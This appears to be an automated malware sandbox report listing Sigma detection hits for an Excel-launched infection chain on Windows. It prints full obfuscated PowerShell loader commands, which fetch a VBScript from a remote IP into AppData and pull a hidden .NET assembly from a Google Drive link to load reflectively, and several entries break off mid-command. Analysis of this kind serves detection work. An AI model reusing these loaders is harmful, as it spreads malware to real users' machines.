        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3568, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE, ProcessId: 3676, ProcessName: powershell.exe
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3568, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , ProcessId: 3864, ProcessName: wscript.exe
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2Fy
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3568, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline", ProcessId: 3772, ProcessName: csc.exe
        Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 5.159.62.244, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3208, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3568, TargetFilename: C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS
        Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3208, Protocol: tcp, SourceIp: 5.159.62.244, SourceIsIpv6: false, SourcePort: 443
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3568, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , ProcessId: 3864, ProcessName: wscript.exe
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3568, TargetFilename: C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline
        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3208, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", CommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgI
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = 